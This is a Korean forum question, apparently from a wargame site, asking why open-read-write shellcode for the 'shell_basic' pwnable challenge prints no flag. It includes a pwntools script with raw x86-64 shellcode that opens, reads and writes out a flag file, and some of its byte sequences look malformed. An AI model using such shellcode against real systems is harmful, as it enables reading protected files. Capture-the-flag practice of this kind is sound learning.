완료됨
shellcode 전송하였는데도 아무 결과가 나오지 않습니다.
read / write하는 asm 코드를 짠 후 컴파일 후 로컬에서 테스트 해 보니, 해당 경로의 flag값을 읽어와 잘 출력하는 것을 확인하였습니다.
이를 dump를 이용해 run_sh 부분의 코드를 추출하여 아래와 같이 전송하였으나 아무런 결과가 나오지 않습니다.
동일한 방법으로 hello world를 출력하는 shellcode를 전송하였을때에는 잘 동작 하였습니다. (shellcode 전송의 문제는 아는것 같습니다.)
p=process('./shell_basic')
shellcode = b'\x48\x31\xc0\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x61\x6d\x65\x5f\x69\x50\x48\xb8\x63\x2f\x66\x6c\x61\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x00\x48\xc7\xc0\x00\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc0\x01\x00\x00\x00\x0f\x05\x48\x31\xff\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05'
p.send(shellcode)
p.interactive()
#pwnable
작성자 정보
답변
2
